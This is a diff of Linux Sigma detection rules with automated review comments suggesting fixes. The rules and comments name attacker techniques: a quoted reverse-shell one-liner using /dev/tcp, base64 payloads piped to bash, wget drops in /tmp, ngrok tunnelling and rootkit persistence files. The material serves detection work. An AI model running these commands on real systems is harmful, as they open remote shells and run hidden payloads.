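Review bot: The tag `attack.t1053.003` is the cron technique and does not fit a rule about `/etc/sudoers.d/`; the sudo-related technique this same commit already uses on the sudo rule, `attack.t1548.003`, is the better companion to `attack.persistence`. The title and description speak of "sudoers file or files in sudoers.d", yet the selection only matches `TargetFilename|startswith: '/etc/sudoers.d/'`, so `/etc/sudoers` itself is never covered — either narrow the description to the drop-in directory or add a second selection `TargetFilename: '/etc/sudoers'` with `condition: 1 of selection*` (whether an in-place edit of that file yields a file_event at all depends on the log source). `persiste` in the description should read `persist`.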
@@ -0,0 +1,27 @@
+title: Potentially Suspicious Shell Script Creation in Profile Folder
+id: 13f08f54-e705-4498-91fd-cce9d9cee9f1
+status: experimental
+description: Detects the creation of shell scripts under the "profile.d" path.
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.persistence
+logsource:
+ product: linux
+ category: file_event
+detection:
+ selection:
+ TargetFilename|contains: '/etc/profile.d/'
+ TargetFilename|endswith:
+ - '.csh'
+ - '.sh'
+ condition: selection
+falsepositives:
+ - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
+ - Regular file creation during system update or software installation by the package manager
+level: low # Can be increased to a higher level after some tuning
diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml
new file mode 100644
index 000000000..4c56cf49f
--- /dev/null
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml
@@ -0,0 +1,21 @@
+title: Triple Cross eBPF Rootkit Default LockFile
+id: c0239255-822c-4630-b7f1-35362bcb8f44
+status: test
+description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
+references:
+ - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/05
+modified: 2022/12/31
+tags:
+ - attack.defense_evasion
+logsource:
+ product: linux
+ category: file_event
+detection:
+ selection:
+ TargetFilename: '/tmp/rootlog'
+ condition: selection
+falsepositives:
+ - Unlikely
+level: high
diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml
new file mode 100644
index 000000000..81fc28ec8
--- /dev/null
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml
@@ -0,0 +1,24 @@
+title: Triple Cross eBPF Rootkit Default Persistence
+id: 1a2ea919-d11d-4d1e-8535-06cda13be20f
+status: test
+description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
+references:
+ - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/07/05
+modified: 2022/12/31
+tags:
+ - attack.persistence
+ - attack.defense_evasion
+ - attack.t1053.003
+
+logsource:
+ product: linux
+ category: file_event
+detection:
+ selection:
+ TargetFilename|endswith: 'ebpfbackdoor'
+ condition: selection
+falsepositives:
+ - Unlikely
+level: high
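Review bot: In the second hunk on this line (lnx_triple_cross_rootkit_persistence) there is a lone `+` between `- attack.t1053.003` and `logsource:`, i.e. a blank line inside the rule body that no other rule in this commit has; drop it so the layout matches the rest. The description confines the indicator to "cron.d" and "sudoers.d", but `TargetFilename|endswith: 'ebpfbackdoor'` fires on that name anywhere on the filesystem, which is broader than documented; that is reasonable for a high-confidence file name, but the description should say `Detects the creation of files named "ebpfbackdoor" (dropped by TripleCross into "cron.d" and "sudoers.d")` so analysts know the path is not checked.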
diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml
new file mode 100644
index 000000000..facf55864
--- /dev/null
+++ b/src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml
@@ -0,0 +1,27 @@
+title: Wget Creating Files in Tmp Directory
+id: 35a05c60-9012-49b6-a11f-6bab741c9f74
+status: experimental
+description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.command_and_control
+ - attack.t1105
+logsource:
+ product: linux
+ category: file_event
+detection:
+ selection:
+ Image|endswith: '/wget'
+ TargetFilename|startswith:
+ - '/tmp/'
+ - '/var/tmp/'
+ condition: selection
+falsepositives:
+ - Legitimate downloads of files in the tmp folder.
+level: medium
diff --git a/src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml b/src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml
deleted file mode 100644
index b086a3a68..000000000
--- a/src/main/resources/rules/linux/modsecurity/modsec_mulitple_blocks.yml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: Multiple Modsecurity Blocks
-id: a06eea10-d932-4aa6-8ba9-186df72c8d23
-status: stable
-description: Detects multiple blocks by the mod_security module (Web Application Firewall)
-author: Florian Roth
-date: 2017/02/28
-logsource:
- product: linux
- service: modsecurity
-detection:
- selection:
- - 'mod_security: Access denied'
- - 'ModSecurity: Access denied'
- - 'mod_security-message: Access denied'
- timeframe: 120m
- condition: selection
-falsepositives:
- - Vulnerability scanners
- - Frequent attacks if system faces Internet
-level: medium
-tags:
- - attack.impact
- - attack.t1499
diff --git a/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
index cda154205..e6337afbc 100644
--- a/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
+++ b/src/main/resources/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml
@@ -1,22 +1,26 @@
 title: Linux Reverse Shell Indicator
 id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
-status: experimental
+status: test
 description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
 references:
- - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+author: Florian Roth (Nextron Systems)
 date: 2021/10/16
-author: Florian Roth
+modified: 2022/12/25
+tags:
+ - attack.execution
+ - attack.t1059.004
 logsource:
- product: linux
- category: network_connection
+ product: linux
+ category: network_connection
 detection:
- selection:
- Image|endswith: '/bin/bash'
- filter:
- DestinationIp:
- - '127.0.0.1'
- - '0.0.0.0'
- condition: selection and not filter
+ selection:
+ Image|endswith: '/bin/bash'
+ filter:
+ DestinationIp:
+ - '127.0.0.1'
+ - '0.0.0.0'
+ condition: selection and not filter
 falsepositives:
- - Unknown
+ - Unknown
 level: critical
diff --git a/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml b/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
index 33aff0f73..4bb860662 100644
--- a/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
+++ b/src/main/resources/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml
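Review bot: The `filter` on the new side excludes only the IPv4 loopback and unspecified addresses `'127.0.0.1'` and `'0.0.0.0'`, so a bash connection to the IPv6 loopback `::1` is not filtered and raises this `critical` alert on dual-stack hosts; adding `- '::1'` to the `DestinationIp` list keeps the exclusion consistent. Because `Image|endswith: '/bin/bash'` is the only positive criterion, every non-loopback outbound connection made directly by bash (package hooks, health-check scripts) is treated as a reverse shell, which `falsepositives: - Unknown` should acknowledge, e.g. `- Administrative or monitoring scripts that open outbound connections directly from bash`. The description's `contecting` is a typo for `connecting`.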
@@ -3,9 +3,12 @@ id: a46c93b7-55ed-4d27-a41b-c259456c4746
 status: stable
 description: Detects process connections to a Monero crypto mining pool
 references:
- - https://www.poolwatch.io/coin/monero
+ - https://www.poolwatch.io/coin/monero
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
-author: Florian Roth
+tags:
+ - attack.impact
+ - attack.t1496
 logsource:
 product: linux
 category: network_connection
diff --git a/src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml b/src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml
new file mode 100644
index 000000000..4496a3c01
--- /dev/null
+++ b/src/main/resources/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml
@@ -0,0 +1,35 @@
+title: Communication To Ngrok Tunneling Service - Linux
+id: 19bf6fdb-7721-4f3d-867f-53467f6a5db6
+status: test
+description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
+references:
+ - https://twitter.com/hakluke/status/1587733971814977537/photo/1
+ - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
+author: Florian Roth (Nextron Systems)
+date: 2022/11/03
+tags:
+ - attack.exfiltration
+ - attack.command_and_control
+ - attack.t1567
+ - attack.t1568.002
+ - attack.t1572
+ - attack.t1090
+ - attack.t1102
+ - attack.s0508
+logsource:
+ product: linux
+ category: network_connection
+detection:
+ selection:
+ DestinationHostname|contains:
+ - 'tunnel.us.ngrok.com'
+ - 'tunnel.eu.ngrok.com'
+ - 'tunnel.ap.ngrok.com'
+ - 'tunnel.au.ngrok.com'
+ - 'tunnel.sa.ngrok.com'
+ - 'tunnel.jp.ngrok.com'
+ - 'tunnel.in.ngrok.com'
+ condition: selection
+falsepositives:
+ - Legitimate use of ngrok
+level: high
diff --git a/src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml b/src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml
deleted file mode 100644
index 4b422fb7c..000000000
--- a/src/main/resources/rules/linux/other/lnx_ssh_cve_2018_15473.yml
+++ /dev/null
@@ -1,22 +0,0 @@
-title: SSHD Error Message CVE-2018-15473
-id: 4c9d903d-4939-4094-ade0-3cb748f4d7da
-status: test
-description: Detects exploitation attempt using public exploit code for CVE-2018-15473
-author: Florian Roth
-references:
- - https://github.com/Rhynorater/CVE-2018-15473-Exploit
-date: 2017/08/24
-modified: 2021/11/27
-logsource:
- product: linux
- service: sshd
-detection:
- keywords:
- - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'
- condition: keywords
-falsepositives:
- - Unknown
-level: medium
-tags:
- - attack.reconnaissance
- - attack.t1589
diff --git a/src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml b/src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml
deleted file mode 100644
index 1f13b201c..000000000
--- a/src/main/resources/rules/linux/other/lnx_susp_failed_logons_single_source.yml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: Failed Logins with Different Accounts from Single Source System
-id: fc947f8e-ea81-4b14-9a7b-13f888f94e18
-status: test
-description: Detects suspicious failed logins with different user accounts from a single source system
-author: Florian Roth
-date: 2017/02/16
-modified: 2021/11/27
-logsource:
- product: linux
- service: auth
-detection:
- selection:
- pam_message: authentication failure
- pam_user: '*'
- pam_rhost: '*'
- timeframe: 24h
- condition: selection
-falsepositives:
- - Terminal servers
- - Jump servers
- - Workstations with frequently changing users
-level: medium
-tags:
- - attack.credential_access
- - attack.t1110
diff --git a/src/main/resources/rules/linux/other/lnx_susp_guacamole.yml b/src/main/resources/rules/linux/other/lnx_susp_guacamole.yml
deleted file mode 100644
index 9de7add4c..000000000
--- a/src/main/resources/rules/linux/other/lnx_susp_guacamole.yml
+++ /dev/null
@@ -1,22 +0,0 @@
-title: Guacamole Two Users Sharing Session Anomaly
-id: 1edd77db-0669-4fef-9598-165bda82826d
-status: test
-description: Detects suspicious session with two users present
-author: Florian Roth
-references:
- - https://research.checkpoint.com/2020/apache-guacamole-rce/
-date: 2020/07/03
-modified: 2021/11/27
-logsource:
- product: linux
- service: guacamole
-detection:
- selection:
- - '(2 users now present)'
- condition: selection
-falsepositives:
- - Unknown
-level: high
-tags:
- - attack.credential_access
- - attack.t1212
diff --git a/src/main/resources/rules/linux/other/lnx_susp_named.yml b/src/main/resources/rules/linux/other/lnx_susp_named.yml
deleted file mode 100644
index 6c7a43e2f..000000000
--- a/src/main/resources/rules/linux/other/lnx_susp_named.yml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: Suspicious Named Error
-id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365
-status: test
-description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
-author: Florian Roth
-references:
- - https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml
-date: 2018/02/20
-modified: 2021/11/27
-logsource:
- product: linux
- service: syslog
-detection:
- keywords:
- - '* dropping source port zero packet from *'
- - '* denied AXFR from *'
- - '* exiting (due to fatal error)*'
- condition: keywords
-falsepositives:
- - Unknown
-level: high
-tags:
- - attack.initial_access
- - attack.t1190
diff --git a/src/main/resources/rules/linux/other/lnx_susp_ssh.yml b/src/main/resources/rules/linux/other/lnx_susp_ssh.yml
deleted file mode 100644
index dbf3e58fe..000000000
--- a/src/main/resources/rules/linux/other/lnx_susp_ssh.yml
+++ /dev/null
@@ -1,33 +0,0 @@
-title: Suspicious OpenSSH Daemon Error
-id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc
-status: test
-description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
-author: Florian Roth
-references:
- - https://github.com/openssh/openssh-portable/blob/master/ssherr.c
- - https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml
-date: 2017/06/30
-modified: 2021/11/27
-logsource:
- product: linux
- service: sshd
-detection:
- keywords:
- - '*unexpected internal error*'
- - '*unknown or unsupported key type*'
- - '*invalid certificate signing key*'
- - '*invalid elliptic curve value*'
- - '*incorrect signature*'
- - '*error in libcrypto*'
- - '*unexpected bytes remain after decoding*'
- - '*fatal: buffer_get_string: bad string*'
- - '*Local: crc32 compensation attack*'
- - '*bad client public DH value*'
- - '*Corrupted MAC on input*'
- condition: keywords
-falsepositives:
- - Unknown
-level: medium
-tags:
- - attack.initial_access
- - attack.t1190
diff --git a/src/main/resources/rules/linux/other/lnx_susp_vsftp.yml b/src/main/resources/rules/linux/other/lnx_susp_vsftp.yml
deleted file mode 100644
index 9109c095c..000000000
--- a/src/main/resources/rules/linux/other/lnx_susp_vsftp.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-title: Suspicious VSFTPD Error Messages
-id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe
-status: test
-description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
-author: Florian Roth
-references:
- - https://github.com/dagwieers/vsftpd/
-date: 2017/07/05
-modified: 2021/11/27
-logsource:
- product: linux
- service: vsftpd
-detection:
- keywords:
- - 'Connection refused: too many sessions for this address.'
- - 'Connection refused: tcp_wrappers denial.'
- - 'Bad HTTP verb.'
- - 'port and pasv both active'
- - 'pasv and port both active'
- - 'Transfer done (but failed to open directory).'
- - 'Could not set file modification time.'
- - 'bug: pid active in ptrace_sandbox_free'
- - 'PTRACE_SETOPTIONS failure'
- - 'weird status:'
- - 'couldn''t handle sandbox event'
- - 'syscall * out of bounds'
- - 'syscall not permitted:'
- - 'syscall validate failed:'
- - 'Input line too long.'
- - 'poor buffer accounting in str_netfd_alloc'
- - 'vsf_sysutil_read_loop'
- condition: keywords
-falsepositives:
- - Unknown
-level: medium
-tags:
- - attack.initial_access
- - attack.t1190
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml
index 9682052eb..8ba08536c 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_at_command.yml
@@ -1,23 +1,26 @@
 title: Scheduled Task/Job At
 id: d2d642d7-b393-43fe-bae4-e81ed5915c4b
 status: stable
-description: Detects the use of at/atd
+description: |
+ Detects the use of at/atd which are utilities that are used to schedule tasks.
+ They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md
 author: Ömer Günal, oscd.community
 date: 2020/10/06
-references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md
+modified: 2022/07/07
+tags:
+ - attack.persistence
+ - attack.t1053.002
 logsource:
 product: linux
 category: process_creation
 detection:
 selection:
 Image|endswith:
- - '/at'
- - '/atd'
+ - '/at'
+ - '/atd'
 condition: selection
 falsepositives:
 - Legitimate administration activities
 level: low
-tags:
- - attack.persistence
- - attack.t1053.002
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml
index 06fa3d0a0..f73fc3efe 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml
@@ -2,22 +2,22 @@ title: Decode Base64 Encoded Text id: e2072cab-8c9a-459b-b63c-40ae79e27031 status: test description: Detects usage of base64 utility to decode arbitrary base64-encoded text -author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md +author: Daniil Yugoslavskiy, oscd.community date: 2020/10/19 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1027 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/base64' - CommandLine|contains: '-d' - condition: selection + selection: + Image|endswith: '/base64' + CommandLine|contains: '-d' # Also covers "--decode" + condition: selection falsepositives: - - Legitimate activities + - Legitimate activities level: low -tags: - - attack.defense_evasion - - attack.t1027 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml new file mode 100644 index 000000000..02cd87e73 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml 
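Review bot: The `CommandLine|contains: '-d'` selector in the rewritten `selection` matches those two characters anywhere in the command line, not only as a flag, so `base64 /tmp/my-data.bin` or `base64 -w0 some-dir/file` fire even though nothing is decoded. Anchoring the flag with a leading space and listing the long form explicitly keeps the documented coverage and drops those hits: `CommandLine|contains:` / `- ' -d'` / `- '--decode'`. Combined short flags such as `-id` would then be missed; if those matter, a `|re` pattern like `' -[a-z]*d'` is the alternative, depending on backend support. The `# Also covers "--decode"` comment should be dropped or moved accordingly.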
@@ -0,0 +1,34 @@ +title: Linux Base64 Encoded Pipe to Shell +id: ba592c6d-6888-43c3-b8c6-689b8fe47337 +status: experimental +description: Detects suspicious process command line that uses base64 encoded input for execution with a shell +references: + - https://github.com/arget13/DDexec + - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally +author: pH-T (Nextron Systems) +date: 2022/07/26 +modified: 2023/06/16 +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: linux + category: process_creation +detection: + selection_base64: + CommandLine|contains: 'base64 ' + selection_exec: + - CommandLine|contains: + - '| bash ' + - '| sh ' + - '|bash ' + - '|sh ' + - CommandLine|endswith: + - ' |sh' + - '| bash' + - '| sh' + - '|bash' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml new file mode 100644 index 000000000..b5017a42e --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml 
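Review bot: `selection_exec` only covers `bash` and `sh`, so `base64 -d | zsh`, `| dash`, `| ksh` and the common `| bash -` / `| sh -s` forms are not caught, and the `CommandLine|endswith` list would likewise need `' -'` variants. Consider adding `'| zsh'`, `'| dash'`, `'| ksh'` to both lists, or replacing the two lists with one `|re` such as `'\|\s*(ba|da|z|k)?sh(\s|$)'` where the backend supports it. Minor: in the `endswith` list `'|sh'` already subsumes `' |sh'`, so the first entry is redundant.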
@@ -0,0 +1,27 @@ +title: Linux Base64 Encoded Shebang In CLI +id: fe2f9663-41cb-47e2-b954-8a228f3b9dff +status: test +description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html + - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: linux + category: process_creation +detection: + selection: + CommandLine|contains: + - "IyEvYmluL2Jhc2" # Note: #!/bin/bash" + - "IyEvYmluL2Rhc2" # Note: #!/bin/dash" + - "IyEvYmluL3pza" # Note: #!/bin/zsh" + - "IyEvYmluL2Zpc2" # Note: #!/bin/fish + - "IyEvYmluL3No" # Note: # !/bin/sh" + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml new file mode 100644 index 000000000..5867934c3 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml @@ -0,0 +1,23 @@ +title: Bash Interactive Shell +id: 6104e693-a7d6-4891-86cb-49a258523559 +status: test +description: Detects execution of the bash shell with the interactive flag "-i". +references: + - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet + - https://www.revshells.com/ + - https://linux.die.net/man/1/bash +author: '@d4ns4n_' +date: 2023/04/07 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/bash' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Unknown +level: low 
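Review bot: The shebang list omits the `env`-style interpreter line, so a payload beginning `#!/usr/bin/env bash` or `#!/usr/bin/bash` is not detected; adding `'IyEvdXNyL2Jpbi9lbnYg'` (`#!/usr/bin/env `) and `'IyEvdXNyL2Jpbi9iYXNo'` (`#!/usr/bin/bash`) closes that, but verify the encodings before merging. The inline notes carry stray quote characters (`#!/bin/bash"`, `# !/bin/sh"`); clean them to `# Note: #!/bin/bash` and `# Note: #!/bin/sh`. Worth a comment as well that these prefixes only match when the shebang sits at offset 0 of the encoded blob; a payload with a prepended line or leading whitespace encodes differently and would need the other two alignments, as the crypto-mining rule in this patch already does for its strings.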
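Review bot: `CommandLine|contains: ' -i '` requires a space after the flag, so a plain `bash -i` (or `/bin/bash -i` launched by a wrapper such as `nc -e`) where `-i` is the last token does not match; the reverse-shell one-liners from the references are caught only because they continue with redirections. Splitting the flag check into its own selection with an `endswith` alternative closes that gap, and since `Image` is pinned to `/bash` the description should say that `sh -i`/`dash -i` are out of scope. `falsepositives: Unknown` undersells it: interactive bash is also spawned by terminals, IDEs and login wrappers, so level low is right but the entry should say so.

```yaml
detection:
    selection_img:
        Image|endswith: '/bash'
    selection_flag:
        - CommandLine|contains: ' -i '
        - CommandLine|endswith: ' -i'
    condition: all of selection_*
```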
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml new file mode 100644 index 000000000..eb6839b7b --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml @@ -0,0 +1,28 @@ +title: Enable BPF Kprobes Tracing +id: 7692f583-bd30-4008-8615-75dab3f08a99 +status: test +description: Detects common command used to enable bpf kprobes tracing +references: + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ + - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/25 +tags: + - attack.execution + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + CommandLine|contains|all: + - 'echo 1 >' + - '/sys/kernel/debug/tracing/events/kprobes/' + CommandLine|contains: + - '/myprobe/enable' + - '/myretprobe/enable' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..8ffc0608f 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml 
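Review bot: The second `CommandLine|contains` list pins the probe name to `/myprobe/enable` and `/myretprobe/enable`, which are the placeholder names from the referenced kernel documentation and blog post; anyone who names the probe differently (`p:foo`, `r:x`) bypasses the rule entirely. Dropping the name and matching `'/enable'` together with the kprobes events path keeps the intent without the hard-coded example: replace the two entries with `- '/enable'` (or fold it into the `contains|all` list). Two caveats worth a comment in the rule: on current kernels tracefs is also exposed at `/sys/kernel/tracing/`, so that prefix should be listed alongside the debugfs one, and the `echo 1 >` redirection is performed by the shell, so it only shows up in process-creation telemetry when the whole command is passed via `sh -c`/`bash -c`.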
@@ -1,23 +1,23 @@ title: BPFtrace Unsafe Option Usage id: f8341cb2-ee25-43fa-a975-d8a5a9714b39 -status: experimental +status: test description: Detects the usage of the unsafe bpftrace option -author: Andreas Hunkeler (@Karneades) -tags: - - attack.execution - - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ +author: Andreas Hunkeler (@Karneades) date: 2022/02/11 +tags: + - attack.execution + - attack.t1059.004 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml new file mode 100644 index 000000000..ff14daba3 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml 
@@ -0,0 +1,25 @@ +title: Capabilities Discovery - Linux +id: d8d97d51-122d-4cdd-9e2f-01b4b4933530 +status: test +description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. +references: + - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes + - https://github.com/carlospolop/PEASS-ng + - https://github.com/diego-treitos/linux-smart-enumeration +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/12/28 +modified: 2024/03/05 +tags: + - attack.discovery + - attack.t1083 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/getcap' + CommandLine|contains|windash: ' -r ' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 83e0dda21..68763fafd 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml 
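Review bot: `CommandLine|contains|windash: ' -r '` applies a Windows-switch modifier to a Linux rule; `windash` makes backends also emit the ` /r ` variant, which is meaningless for `getcap` and is not supported by every backend, so it should be plain `CommandLine|contains: ' -r '`. Because the flag check is space-delimited, combined forms such as `getcap -rv /` are also missed; if that matters, add `' -vr '`/`' -rv '` entries or use a `|re` pattern. Non-recursive use (`getcap /usr/bin/python3`) is ignored too, which the GTFOBins framing suggests is intended, but a one-line note saying only recursive scans are covered would help tuning.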
